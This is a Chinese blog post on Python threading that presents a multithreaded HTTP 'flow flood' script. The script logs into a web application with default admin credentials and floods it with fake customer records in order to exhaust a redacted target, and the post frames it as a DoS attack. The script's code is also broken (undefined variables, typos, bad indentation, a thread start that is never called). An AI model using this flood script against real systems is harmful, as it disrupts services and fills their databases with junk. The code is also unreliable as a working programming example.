python安全脚本编写之流量泛洪

已于 2024-07-31 20:22:34 修改
阅读量161 收藏 3
点赞数 5
分类专栏: Python 文章标签: python 安全 算法
于 2024-07-31 20:18:53 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46062641/article/details/140831699
版权

多线程与流量泛洪

并发操作

如果一个单核的cpu,是并不存在严格意义的并发,只是因为处理时间极短,所以感觉上是并发操作的。

针对多核CPU,4核CPU,严格意义上的并发处理是4个

线程和进程

  1. 每一个应用程序,至少会有一个进程,并且拥有PID(进程ID)和独立的内存空间。
  2. 每一个进程至少拥有一个线程,而线程并没有独立的内存空间。

泛红初体验之thread.py

import threading
import time,random
# 单线程情况下,下述代码执行或消耗5秒钟的时间
def test_01():
    print(threading.currentThread().getName())	# 输出当前线程的名字
    for i in range(5):
        print(time.strftime('%Y-%m-%d %H:%M:%S'))
        time.sleep(1)
# 使用多线程的方式输入5次时间
def test_02():
    print(threading.currentThread().getName())
    print(time.strftime('%Y-%m-%d %H:%M:%S'))
    time.sleep(1)
    
    
session=requests.session()
def home():
    url="xx.xx.xx"
    resp=session.get(url)
    if "xxxxxxxxx" in resp.text:
        print("首页访问成功")
    else:
        print("首页访问失败")
def login():
    data={'username':'admin','password':'admin','verifycode':'0000'}
    resp=session.post(url=url,data=data)
    if resp.test=='login-pass':
        print('登陆成功')
    else:
        print('登陆失败')
        
def add():
    data={'customername':'未知','customerphone':f'13{random.randint(30000000,999999999)}','childsex':'男','childdate':'2021-10-15','creditkids':'0','creditcloth':'0'}
    resp=session.post(f"{url}/xxxx/customer/add",data=data)
    if resp.text=="add-successful":
        print("新增会员成功")
    else:
        print("新增会员失败")
# 基于HTTP协议,进行流量的泛洪,压力测试,性能测试
# 使用多线程模拟流量泛红(Flow Flood) 攻击xxx.xxx.xxx
def xxxxsales_flood():
    for i in range(1000):
        try:
	        home()
        	login()
            add()
        except:
            pass

    
if __name__=='__main__':
    # test_01()	# 当python执行时,虽然没有手工启动线程,默认Python会启动一个主线程
    # 并发启动5个线程
    #for i in range(5):
        # 实例化一个线程,target表示是哪个方法,将那个方法传过去,注意没有圆括号,有圆括号就是调用了,若目标函数有参数,在后面跟上args=(),以元组的方式传过去即可
        # 或者这样描述,实例化一个线程,并且指定调用test_02函数
        #t=threading.Thread(target=test_02)
        # 启动线程
        #t.start()
    #test_02()
    for i in range(100):
        threading.Thread(target=wxxxxales_flood).start

DOS攻击的核心

利用常规技术或特殊技术,想办法消耗掉目标服务器的资源(CPU、内存、硬盘,带宽,连接数等),使其无法正常提供对外服务

小知识点:

装饰器

可以用于收集其响应时间

def performance(func):
    def inner():
        start=time.time()
        func()
        end=time.time()
        print(f"请求:{func.__name__}的响应时间为:{end-start}")
    return inner
@performance
def home():
    url="xx.xx.xx"
    resp=session.get(url)
    if "xxxxxxxxx" in resp.text:
        print("首页访问成功")
    else:
        print("首页访问失败")
曹博Blog
关注
  • 5
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Python安全攻防-从入门到入狱
Yasso的博客
01-31 1万+
Python安全攻防-从入门到入狱
2024年Python最新python网络渗透之:DOS攻击篇_ddos攻击脚本(1)
2401_84584854的博客
05-01 636
Python崛起并且风靡,因为优点多、应用领域广、被大牛们认可。学习 Python 门槛很低,但它的晋级路线很多,通过它你能进入机器学习、数据挖掘、大数据,CS等更加高级的领域。Python可以做网络应用,可以做科学计算,数据分析,可以做网络爬虫,可以做机器学习、自然语言处理、可以写游戏、可以做桌面应用…Python可以做的很多,你需要学好基础,再选择明确的方向。这里给大家分享一份全套的 Python 学习资料,给那些想学习 Python 的小伙伴们一点帮助!
最新python网络渗透之:DOS攻击篇_ddos攻击脚本
2401_84556681的博客
05-03 117
什么是Dos攻击?所谓的DOS攻击就是,即拒绝服务攻击(Denial Service attack),指在通过耗尽目标系统的资源,使其无法提供正常的服务。这种攻击通常会导致系统奔溃、停机或变得不可用。可能我们平常听的最多的是DDOS攻击即分布式拒绝服务攻击(Denial of Service attack),DDOS攻击的本质就是DOS攻击,只不过DOS攻击是单一的网络来源,而DDOS则是多个网络来源。
python网络渗透之:DOS攻击篇
hih30250的博客
12-18 2963
Smurf攻击是旨在通过发送大量伪造的ICMP回应数据报给一个或多个目标IP地址来使其宕机。这种攻击方式得名于使用了一种叫做“Smurf程序”的工具。Smurf攻击就是属于DDOS攻击的一种。Smurf攻击的原理是利用了ICMP Echo Request消息(即Ping请求),当有大量的Echo Request消息被发送到网上广播地址(Broadcast Address),所有收到此消息的主机都会向源IP地址回复并返回ICMP Echo Reply消息(即Ping响应)。
Python项目 基于Scapy实现SYN泛洪攻击的方法
09-19
**Python项目:基于Scapy实现SYN泛洪攻击** SYN泛洪攻击是一种常见的拒绝服务(Denial of Service, DoS)攻击手段,它利用TCP三次握手过程中的漏洞,通过发送大量伪造的SYN请求来消耗目标服务器的资源,使其无法...
python之——使用python编写爆破脚本
12-21
此处以dvwa网站的密码爆破为例... #coding:utf-8 """ dvwa高级爆破 ...""" import urllib2 from bs4 import BeautifulSoup def getToken(): """提取token""" ... req=urllib2.Request(url,headers={"Cookie":"security=high;...
Python脚本实现网卡流量监控
12-25
#/usr/bin/env/python #coding=utf-8 import sys,re,time,os maxdata = 50000 #单位KB memfilename = '/tmp/newnetcardtransdata.txt' netcard = '/proc/net/dev' def checkfile(filename): if os.path.is...
个人编写python脚本
04-29
在"个人编写python脚本"这个主题下,我们可以深入探讨Python脚本的编写过程、常用库和工具,以及如何利用Python进行实际问题的解决。 首先,Python脚本的基本结构包括注释、变量定义、函数和类的声明。注释用于解释...
python编写脚本工具
09-30
Python 编写脚本工具是Python开发者不可或缺的利器,它能极大地提高开发效率并减少语法错误。Python作为一种高级编程语言,其语法结构清晰,易于学习,但错误处理并不宽容,尤其是当使用非Python原生的编写工具时,...
快醒醒,别睡了!...讲《数据分析pandas库》了—/—<4>
qq_64603703的博客
07-27 1000
详细解说数据分析pandas库中的常用方法
Python】pandas:排序、重复值、缺省值处理、合并、分组
最新发布
yannan20190313的博客
07-30 518
Python】pandas:排序(sort_index,sort_values,nsmallest,nlargest)、重复值(duplicated,drop_duplicates,value_counts,nunique)、缺省值处理(isna,isnull,notna,notnull,fillna,dropna,replace)、合并(join,merge,append,concat)、分组(groupby)
全网最详细Gradio教程系列5——Gradio Client: python
shao918516的博客
07-26 1096
程序部署完成后,如何将Gradio App作为API访问使用呢,这就用到Gradio Client。本章讲解Gradio Client的三种使用方式:python、javascript和curl,受字数限制,所以分三篇博客发布。 使用Gradio Python Client非常易于将Gradio应用程序作为API使用,本节讲述gradio_client安装、如何连接Gradio应用程序、查看可用API及其使用方式、job及session等用法。 通过Gradio Python Cli
Chapter 18 Python异常
2302_80253507的博客
07-28 1234
Python中,异常是一种特定的对象,能够在程序运行过程中被抛出和处理。有效地管理异常不仅可以增强程序的稳定性,还可以提高用户体验,使程序能够优雅地处理错误情况。本章详细讲解了异常的基本概念以及如何捕获和处理异常。
loguru日志模块:简化Python自动化测试的日志管理!
07-29 764
日志是软件开发中的关键组成部分,为开发和测试人员提供了调试和监控应用程序的重要手段。loguru 是一个第三方的 Python 日志库,以其简洁的 API 和自动化的功能脱颖而出。本文将探讨为什么项目中需要日志,loguru 为何受到青睐,以及如何封装和在接口自动化测试项目中使用 loguru,同时结合 Allure 生成丰富的测试报告。
安卓手机部署大模型实战
奇舞周刊
07-25 1150
本文作者系360奇舞团前端开发工程师前言自ChatGPT发布以来,大语言模型(Large language model, LLM)就成了AI乃至整个计算机科学的话题中心。学术界,工业界围绕大语言模型本身及其应用展开了广泛的讨论,大量的新的实践层出不穷。由于LLM对计算资源的需求极大,有能力部署大语言模型的公司和实验室一般通过搭建集群,然后开放API或者网页demo的方式让用户可以使用模型。在人们纷...
Python入门知识点 10--闭包与装饰器
@网工小赵的博客
07-30 713
什么情况下会用到装饰器特性:在不修改源代码的基础上,给函数加功能。
Python数据增强】图像数据集扩充
阿齐Archie
07-25 2332
该脚本用于图像数据增强,特别是目标检测任务中的图像和标签数据增强。通过应用一系列数据增强技术(如旋转、平移、裁剪、加噪声、改变亮度、cutout、翻转等),生成多样化的图像数据集,以提高目标检测模型的鲁棒性和准确性。
python语言利用Tkinter实现GUI计算器|(二)优化计算器:过滤用户不合理的输入
人工智能视觉分析算法学习实践和经验分享。
07-27 763
python语言利用Tkinter实现GUI计算器|(二)优化计算器python语言利用Tkinter实现GUI计算器|(二)计算器打包。
使用python编写流量分析脚本
05-12
流量分析是指对网络传输的数据进行统计、分析和监控,以便了解网络应用程序的使用情况和网络性能状况。Python作为一种高级编程语言,具有易学易用、功能强大、灵活性高等优点,因此在流量分析领域也被广泛应用。 下面我们来介绍一下如何使用Python编写流量分析脚本。 ### 1. 安装必要的Python库 在编写流量分析脚本前,需要安装一些必要的Python库,包括: - Scapy:用于网络数据包的捕获、分析和生成。 - Matplotlib:用于绘制图表和数据可视化。 - NumPy:用于处理数值数据。 可以使用pip来安装这些库: ``` pip install scapy matplotlib numpy ``` ### 2. 捕获网络数据包 使用Scapy库可以轻松捕获网络数据包,例如: ```python from scapy.all import * def packet_callback(packet): print(packet.summary()) sniff(prn=packet_callback, count=10) ``` 上面的代码可以捕获前10个网络数据包,并打印每个数据包的简要信息。可以通过修改packet_callback函数来进行更复杂的数据包处理。 ### 3. 分析数据包 使用Scapy库可以对捕获的数据包进行分析,例如: ```python from scapy.all import * pkts = rdpcap('test.pcap') for pkt in pkts: print(pkt.summary()) ``` 上面的代码可以读取一个PCAP文件并逐个打印每个数据包的简要信息。 ### 4. 统计流量数据 使用Scapy库可以统计流量数据,例如: ```python from scapy.all import * pkts = rdpcap('test.pcap') print(len(pkts)) # 总共捕获的数据包数量 print(pkts[0].time) # 第一个数据包的时间戳 print(pkts[-1].time) # 最后一个数据包的时间戳 print(len(pkts.filter(lambda pkt: IP in pkt))) # IP数据包数量 print(len(pkts.filter(lambda pkt: TCP in pkt))) # TCP数据包数量 ``` 上面的代码可以统计捕获的数据包数量、时间范围以及不同协议类型的数据包数量。 ### 5. 可视化数据 使用Matplotlib库可以绘制图表和数据可视化,例如: ```python import matplotlib.pyplot as plt import numpy as np x = np.array([1, 2, 3, 4, 5]) y = np.array([10, 20, 30, 40, 50]) plt.plot(x, y) plt.xlabel('x') plt.ylabel('y') plt.show() ``` 上面的代码可以绘制一个简单的折线图,用于表示数据的变化趋势。 以上就是使用Python编写流量分析脚本的基本步骤。当然,具体的分析内容和需要实现的功能会根据具体的场景而有所不同。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

曹博Blog

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值